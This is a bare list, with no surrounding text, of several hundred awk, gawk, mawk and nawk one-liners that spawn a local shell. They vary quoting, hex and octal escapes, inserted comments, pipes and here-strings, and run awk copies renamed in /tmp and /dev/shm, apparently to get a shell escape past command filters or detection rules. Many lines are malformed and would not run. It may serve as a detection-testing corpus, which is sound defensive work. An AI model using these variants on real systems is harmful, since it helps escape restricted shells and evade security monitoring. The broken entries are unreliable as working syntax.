awk 'BEGIN {system("/bin/"sh")}'
awk 'BEGIN {system("/bi"n/sh)}'
awk 'BEGIN {system("/bin/sh" "")}'
awk 'BEGIN {system("/b""in/sh")}'
awk 'BEGIN {system("/bin/s""h")}'
awk 'BEGIN {system("/"bin/sh")}'
awk 'BEGIN {system("/bin//sh")}'
awk 'BEGIN {system("/bin/sh" )}'
awk 'BEGIN {system("/bin/""sh")}'
awk 'BEGIN {system("/bi""n/s""h")}'
awk 'BEGIN {system("/b" "in" "/sh")}'
awk 'BEGIN {system("/bin/sh"#)}'
awk 'BEGIN {system("/bin/sh/*")}'
awk 'BEGIN {system("/bin/sh\0")}'
awk 'BEGIN {system("/bin/\sh")}'
awk 'BEGIN {system("/bin/s\tsh")}'
awk 'BEGIN {system("/bin/sh")#comment}'
awk 'BEGIN {system("/bin/sh")/*insert*/}'
awk 'BEGIN {system("/bin/sh" /*hack*/)}'
awk 'BEGIN {system("/bin/"sh"")}'
awk 'BEGIN {system("/bin" "/sh")}'
awk 'BEGIN {system("/bi" "n/sh")}'
awk 'BEGIN {system("/bin/sh" "\n")}'
awk 'BEGIN {system("/bin" "//sh")}'
awk 'BEGIN {system("/bin/sh" "//")}'
awk 'BEGIN {system("/bin/sh" " ") }'
awk 'BEGIN {system("/b\\in/sh")}'
awk 'BEGIN {system("/bin\\sh")}'
awk 'BEGIN {system("/bin/sh ")}'
awk 'BEGIN {system("/bin/sh"/*bypass*/)}'
awk 'BEGIN {system("/bin/sh" "\t")}'
awk 'BEGIN {system("/b""in/""sh")}'
awk 'BEGIN {system("/bin/" "sh")}'
awk 'BEGIN {system("/bi\nn/sh")}'
awk 'BEGIN {system("/bin/s\nh")}'
awk 'BEGIN {system("/b\\in\\sh")}'
awk 'BEGIN {system("/bin/sh\x00")}'
awk 'BEGIN {system("/bin/sh" "\r")}'
awk 'BEGIN {system("/bi\t\nn/s\rh")}'
awk 'BEGIN {system("/bin/sh" "\x20")}'
awk 'BEGIN {system("/bin/sh" "#injected")}'
awk 'BEGIN {system("/bin" "/sh" "")}'
awk 'BEGIN {system("/bin/sh" /*evasion*/) }'
awk 'BEGIN {system("/bin/sh" /* obfuscated */)}'
awk 'BEGIN {system("/bi""n/""sh" )}'
awk 'BEGIN {system("/bin/sh" " ")#extra}'
awk 'BEGIN {system("/bin/s\\h")}'
awk 'BEGIN {system("/bi\\n/sh")}'
awk 'BEGIN {system("/bin" + "/sh")}'
awk 'BEGIN {system("/bi"+"n/sh")}'
awk 'BEGIN {system("/bin/" + "sh")}'
gawk 'BEGIN {system("/bin/sh")}'
nawk 'BEGIN {system("/bin/sh")}'
mawk 'BEGIN {system("/bin/sh")}'
awk 'BEGIN {system("/bin/bash")}'
awk 'BEGIN {system("/bin/dash")}'
awk 'BEGIN {system("/bin/zsh")}'
awk 'BEGIN {system("/bin/fish")}'
gawk 'BEGIN {system("/bin/bash")}'
nawk 'BEGIN {system("/bin/zsh")}'
mawk 'BEGIN {system("/bin/dash")}'
awk 'BEGIN {system("/usr/bin/sh")}'
gawk 'BEGIN {system("/usr/bin/bash")}'
awk 'BEGIN {system("/usr/local/bin/sh")}'
awk 'BEGIN {system("/sbin/sh")}'
awk 'BEGIN {system("/bin//sh")}'
awk 'BEGIN {system("/bin/sh -i")}'
gawk 'BEGIN {system("/bin/sh -i")}'
nawk 'BEGIN {system("/bin/sh -i")}'
awk 'BEGIN {system("/bin/sh")}'
awk 'BEGIN {system('/bin/sh')}'
awk "BEGIN {system('/bin/sh')}"
awk "BEGIN {system("/bin/sh")}"
awk "BEGIN {system('/bin/bash')}"
gawk "BEGIN {system('/bin/zsh')}"
nawk "BEGIN {system('/bin/dash')}"
mawk "BEGIN {system('/bin/fish')}"
awk 'BEGIN {system("/bin/sh");}'
gawk 'BEGIN {system("/bin/sh");}'
awk 'BEGIN {system("/bin\sh")}'
awk 'BEGIN {system("/bin/sh ")}'
awk 'BEGIN {system("/bin/sh >&2")}'
gawk 'BEGIN {system("/bin/sh</dev/null")}'
awk 'BEGIN {system("/bin/sh 0<&1")}'
gawk 'BEGIN {system("/bin/sh 2>&1")}'
nawk 'BEGIN {system("/bin/sh 1>&2")}'
mawk 'BEGIN {system("/bin/sh #comment")}'
gawk 'BEGIN {system("/bin/sh --norc")}'
awk 'BEGIN {system("/bin/sh -c true")}'
awk 'BEGIN {system("/bin/sh; echo OK")}'
awk 'BEGIN {system("/bin/sh || true")}'
gawk 'BEGIN {system("/bin/sh && true")}'
mawk 'BEGIN {system("/bin/sh;#")}'
nawk 'BEGIN {system("/bin/sh\t")}'
awk 'BEGIN {system("/bin/sh ") #note}'
awk 'BEGIN {system("/bin/sh | cat")}'
awk 'BEGIN {system("/bin/sh && :")}'
awk 'BEGIN {system("/bin/sh -s")}'
awk 'BEGIN {system("/bin/sh --login")}'
gawk 'BEGIN {system("/bin/sh --posix")}'
awk 'BEGIN {system("/bin/sh -")}'
awk 'BEGIN{system("/bin/sh")}'
awk BEGIN{system("/bin/sh")}
awk 'BEGIN{system(/bin/sh)}'
awk 'BEGIN {system(/bin/sh)}'
awk BEGIN {system("/bin/sh")}
awk 'BEGIN system("/bin/sh")'
awk BEGIN system("/bin/sh")
awk 'BEGIN{system("/bin/sh")
awk BEGIN{system("/bin/sh")
awk BEGIN system(/bin/sh)
awk BEGIN{system(/bin/sh)}
awk BEGIN system("/bin/sh"
awk 'BEGIN{system "/bin/sh"}'
awk 'BEGIN system("/bin/sh"}'
awk 'BEGIN system /bin/sh'
awk 'BEGIN {system /bin/sh}'
awk 'BEGIN {system /bin/sh}'
awk BEGIN {system /bin/sh}
awk 'BEGIN system /bin/sh'
awk BEGIN system /bin/sh
awk 'BEGIN{system"/bin/sh"}'
awk BEGIN{system"/bin/sh"}
awk BEGIN{system "/bin/sh"}
awk BEGIN system"/bin/sh"
awk 'BEGIN system"/bin/sh"'
awk 'BEGIN{system "/bin/sh"}'
awk 'BEGIN{system "/bin/sh"}'
awk 'BEGIN { system("/bin/sh") }'
awk BEGIN { system("/bin/sh") }
awk 'BEGIN {system("/bin/sh")}'
awk 'BEGIN{ system("/bin/sh") }'
awk 'BEGIN{system("/bin/sh");}'
awk 'BEGIN{system("/bin/sh")}'
awk 'BEGIN{system("/bin/sh")}'
awk 'BEGIN{system("/bin/sh")}'
awk 'BEGIN{system("/bin/sh")}'
awk 'BEGIN { system("/bin/sh") }'
awk 'BEGIN{ system("/bin/sh") }'
awk 'BEGIN {system "/bin/sh"}'
awk BEGIN{system "/bin/sh"}
awk BEGIN system "/bin/sh"
awk 'BEGIN{system "/bin/sh"}'
awk 'BEGIN system "/bin/sh"'
awk 'BEGIN {system "/bin/sh"}'
awk 'BEGIN system("/bin/sh")'
awk BEGIN system("/bin/sh")
awk 'BEGIN system /bin/sh'
awk BEGIN system /bin/sh
awk 'BEGIN{system "/bin/sh"}'
awk BEGIN{system "/bin/sh"}
awk 'BEGIN {system("/bin/sh")}'
awk 'BEGIN {system("/bin/sh")}'
'BEGIN {system("/bin/sh")}' awk
'BEGIN {system("/bin/sh")}' | awk
awk -v x='BEGIN {system("/bin/sh")}' "$x"
echo 'BEGIN {system("/bin/sh")}' | awk
awk '{if(NR==1) system("/bin/sh")}' <<< "run"
awk 'BEGIN {system("/bin/sh")}' </dev/null
printf 'BEGIN {system("/bin/sh")}\n' | awk
awk 'BEGIN {system("/bin/sh")}'<<<""
cat /dev/null | awk 'BEGIN {system("/bin/sh")}'
awk <<< 'BEGIN {system("/bin/sh")}'
true | awk 'BEGIN {system("/bin/sh")}'
awk 'BEGIN {"/bin/sh" | getline x; close("/bin/sh")}'
awk <<<BEGIN'{system("/bin/sh")}'
awk<<<'BEGIN{system("/bin/sh")}'
:|awk 'BEGIN {system("/bin/sh")}'
awk 'BEGIN {system("/bin/sh")}' <<EOF
bash -c 'awk "BEGIN {system(\"/bin/sh\")}"'
awk <<<"BEGIN {system(\"/bin/sh\")}"
echo BEGIN {system(\"/bin/sh\")} | awk
awk 'BEGIN {system("/bin/sh")}' | cat
awk 'BEGIN {system("/bin/sh")}' | tee /dev/null
awk 'BEGIN {system("/bin/sh")}' && echo
awk 'BEGIN {system("/bin/sh")}' &
awk 'BEGIN {system("/bin/sh")}' & wait
awk 'BEGIN {system("/bin/sh")}' && true
awk -W interactive 'BEGIN {system("/bin/sh")}'
env CMD='system("/bin/sh")' awk 'BEGIN {ENVIRON["CMD"]}'
awk 'BEGIN {a="/bin/sh"; system(a)}'
awk 'BEGIN {s="sh"; system("/bin/"s)}'
awk 'BEGIN {s="/"; t="bin"; u="sh"; system(s t "/" u)}'
awk 'BEGIN {s="/bin/sh"; system(s)}'
awk 'BEGIN {c="system"; c("/bin/sh")}'
awk 'BEGIN {a="/bin"; b="/sh"; system(a b)}'
awk 'BEGIN {cmd="/bin/sh"; system(cmd)}'
awk 'BEGIN {system("/bin/sh" "")}'
awk 'BEGIN {system(sprintf("%s","/bin/sh"))}'
awk 'BEGIN {system("/bin/sh" "\x00")}'
awk 'BEGIN {sys=system; sys("/bin/sh")}'
awk 'BEGIN {if(1) system("/bin/sh")}'
awk 'BEGIN {while(!system("/bin/sh")) break}'
awk 'BEGIN {exit system("/bin/sh")}'
awk 'BEGIN {for(i=0;i<1;i++) system("/bin/sh")}'
awk 'BEGIN {a="/bin/";b="sh";system(a b)}'
awk 'BEGIN {s="/bin/sh";x=system;x(s)}'
awk 'BEGIN {system("/bin/sh");exit}'
awk 'BEGIN {s="/bin/sh";while(1) {system(s);break}}'
awk 'BEGIN {s="/bin/sh";system(s);}'
awk 'BEGIN {s="/bin/sh";if(length(s)) system(s)}'
awk 'BEGIN {system("/bin/sh")}'
awk 'BEGIN {system("/bin/sh") }'
awk 'BEGIN {system("/b\x69n/sh")}'
awk 'BEGIN {system("/b\141sh")}'
awk 'BEGIN {system("/bin" "/sh")}'
awk 'BEGIN {system(sprintf("%s", "/bin/sh"))}'
awk 'BEGIN {s="/bin/sh"; system(s)}'
awk 'BEGIN{system("/b\105n/sh")}'
awk 'BEGIN {system("/bi""n/sh")}'
awk 'BEGIN{cmd="/bin/sh"; system(cmd)}'
awk 'BEGIN{system("\x2f\x62\x69\x6e\x2f\x73\x68")}'
awk 'BEGIN{system(char(47) "bin/sh")}'
awk 'BEGIN{system("/bin/" "sh")}'
awk 'BEGIN{system("/b""in/sh")}'
awk 'BEGIN{system("/bin/s""h")}'
awk 'BEGIN{cmd="/bin/sh"; system(cmd)}'
awk 'BEGIN{system("/bin/sh" "")}'
awk 'BEGIN{system("/b" "in/" "sh")}'
awk 'BEGIN{system("/bin" substr("/sh",0))}'
awk 'BEGIN{system("/b\x69\x6e/sh")}'
awk 'BEGIN{system("\057\142\151\156\057\163\150")}'
awk 'BEGIN{system("/bin/sh"#comment)}'
awk 'BEGIN{system("/bin/sh"/*noop*/)}'
awk 'BEGIN{system("/bin//sh")}'
awk 'BEGIN{system("/bi/../bin/sh")}'
awk 'BEGIN{system("/bin/sh" ORS)}'
awk 'BEGIN{system("/bin/sh" "")}'
awk 'BEGIN{system("/bin" sprintf("%s", "/sh"))}'
awk 'BEGIN{cmd="/bin/sh"; system(cmd FS "")}'
awk 'BEGIN{system("/bi" "n/sh")}'
awk 'BEGIN{system("/bi""n/""sh")}'
awk 'BEGIN{system("/bin/sh\x00")}'
awk 'BEGIN{system("/bin/sh" "\n")}'
awk 'BEGIN{system("/bin/" "sh" "")}'
awk 'BEGIN{system("/bin/" tolower("SH"))}'
awk 'BEGIN{cmd="/bin/sh"; print cmd |& "/bin/sh"}'
awk 'BEGIN{system(ENVIRON["SHELL"])}'
awk 'BEGIN{sys="/bin/sh"; system(sys)}'
awk 'BEGIN{a="/bin";b="/sh";system(a b)}'
awk 'BEGIN{a=47 b=98 c=105 d=110 e=47 f=115 g=104; cmd=sprintf("%c%c%c%c%c%c%c",a,b,c,d,e,f,g); system(cmd)}'
awk 'BEGIN{system("/bin/sh\0")}'
awk 'BEGIN{system("/bin/sh\t")}'
awk 'BEGIN{cmd="/bin/sh"; if(length(cmd)) system(cmd)}'
awk 'BEGIN{if(1){system("/bin/sh")}}'
awk 'BEGIN{(system)("/bin/sh")}'
awk 'BEGIN{system("/b" "in" "/" "sh")}'
awk 'BEGIN{system("/bin" "/" "sh")}'
awk 'BEGIN{cmd="/bin/sh"; system(cmd "")}'
awk 'BEGIN{system("/bin/sh\072")}'
awk 'BEGIN{system("/bin/sh\012")}'
cp $(which awk) /tmp/t; /tmp/t 'BEGIN {system("/bin/sh")}'
cp /usr/bin/awk /tmp/x; /tmp/x 'BEGIN {system("/bin/sh")}'
cp /bin/awk ./a; ./a 'BEGIN {system("/bin/sh")}'
install /usr/bin/awk /tmp/b; /tmp/b 'BEGIN {system("/bin/sh")}'
ln /bin/awk /tmp/h; /tmp/h 'BEGIN {system("/bin/sh")}'
ln -s $(which awk) ./j; ./j 'BEGIN {system("/bin/sh")}'
cp $(command -v awk) ./q; ./q 'BEGIN {system("/bin/sh")}'
cp $(which gawk) /tmp/a1; /tmp/a1 'BEGIN {system("/bin/sh")}'
cp /usr/bin/gawk /tmp/a2; /tmp/a2 'BEGIN {system("/bin/sh")}'
cp /bin/gawk ./a3; ./a3 'BEGIN {system("/bin/sh")}'
install /usr/bin/gawk /tmp/a4; /tmp/a4 'BEGIN {system("/bin/sh")}'
ln /bin/gawk /tmp/a5; /tmp/a5 'BEGIN {system("/bin/sh")}'
cp $(command -v gawk) ./a6; ./a6 'BEGIN {system("/bin/sh")}'
cp $(which mawk) /tmp/m1; /tmp/m1 'BEGIN {system("/bin/sh")}'
cp /usr/bin/mawk /tmp/m2; /tmp/m2 'BEGIN {system("/bin/sh")}'
cp /bin/mawk ./m3; ./m3 'BEGIN {system("/bin/sh")}'
install /usr/bin/mawk /tmp/m4; /tmp/m4 'BEGIN {system("/bin/sh")}'
ln /bin/mawk /tmp/m5; /tmp/m5 'BEGIN {system("/bin/sh")}'
cp $(command -v mawk) ./m6; ./m6 'BEGIN {system("/bin/sh")}'
cp $(which nawk) /tmp/n1; /tmp/n1 'BEGIN {system("/bin/sh")}'
cp /usr/bin/nawk /tmp/n2; /tmp/n2 'BEGIN {system("/bin/sh")}'
cp /bin/nawk ./n3; ./n3 'BEGIN {system("/bin/sh")}'
install /usr/bin/nawk /tmp/n4; /tmp/n4 'BEGIN {system("/bin/sh")}'
ln /bin/nawk /tmp/n5; /tmp/n5 'BEGIN {system("/bin/sh")}'
cp $(command -v nawk) ./n6; ./n6 'BEGIN {system("/bin/sh")}'
cp /usr/bin/awk /dev/shm/ax; /dev/shm/ax 'BEGIN {system("/bin/sh")}'
cp /usr/bin/awk /tmp/.awk; /tmp/.awk 'BEGIN {system("/bin/sh")}'
cp /usr/bin/awk /tmp/shellcaller; /tmp/shellcaller 'BEGIN {system("/bin/sh")}'
cp /usr/bin/awk /var/tmp/x; /var/tmp/x 'BEGIN {system("/bin/sh")}'
cp /usr/bin/awk ./awk1; ./awk1 'BEGIN {system("/bin/sh")}'
cp /usr/bin/awk ./runawk; ./runawk 'BEGIN {system("/bin/sh")}'
cp /usr/bin/awk ./cmd; ./cmd 'BEGIN {system("/bin/sh")}'
cp /usr/bin/awk ./util; ./util 'BEGIN {system("/bin/sh")}'
cp /usr/bin/awk ./x123; ./x123 'BEGIN {system("/bin/sh")}'
cp /usr/bin/awk ./zzz; ./zzz 'BEGIN {system("/bin/sh")}'
cp /usr/bin/awk ./starter; ./starter 'BEGIN {system("/bin/sh")}'
cp /usr/bin/awk ./dotcmd; ./dotcmd 'BEGIN {system("/bin/sh")}'
cp /usr/bin/awk ./bin.fake; ./bin.fake 'BEGIN {system("/bin/sh")}'
cp /usr/bin/awk ./hidden; ./hidden 'BEGIN {system("/bin/sh")}'
cp /usr/bin/awk ./_a; ./_a 'BEGIN {system("/bin/sh")}'
cp /usr/bin/awk ./z_; ./z_ 'BEGIN {system("/bin/sh")}'
cp /usr/bin/awk ./boot; ./boot 'BEGIN {system("/bin/sh")}'
cp /usr/bin/awk ./core; ./core 'BEGIN {system("/bin/sh")}'
cp /usr/bin/awk ./net; ./net 'BEGIN {system("/bin/sh")}'
cp /usr/bin/awk ./sys; ./sys 'BEGIN {system("/bin/sh")}'
cp /usr/bin/awk ./lsd; ./lsd 'BEGIN {system("/bin/sh")}'
cp /usr/bin/awk ./get; ./get 'BEGIN {system("/bin/sh")}'
cp /usr/bin/awk ./push; ./push 'BEGIN {system("/bin/sh")}'
cp /usr/bin/awk ./shellify; ./shellify 'BEGIN {system("/bin/sh")}'
cp /usr/bin/awk ./runtime; ./runtime 'BEGIN {system("/bin/sh")}'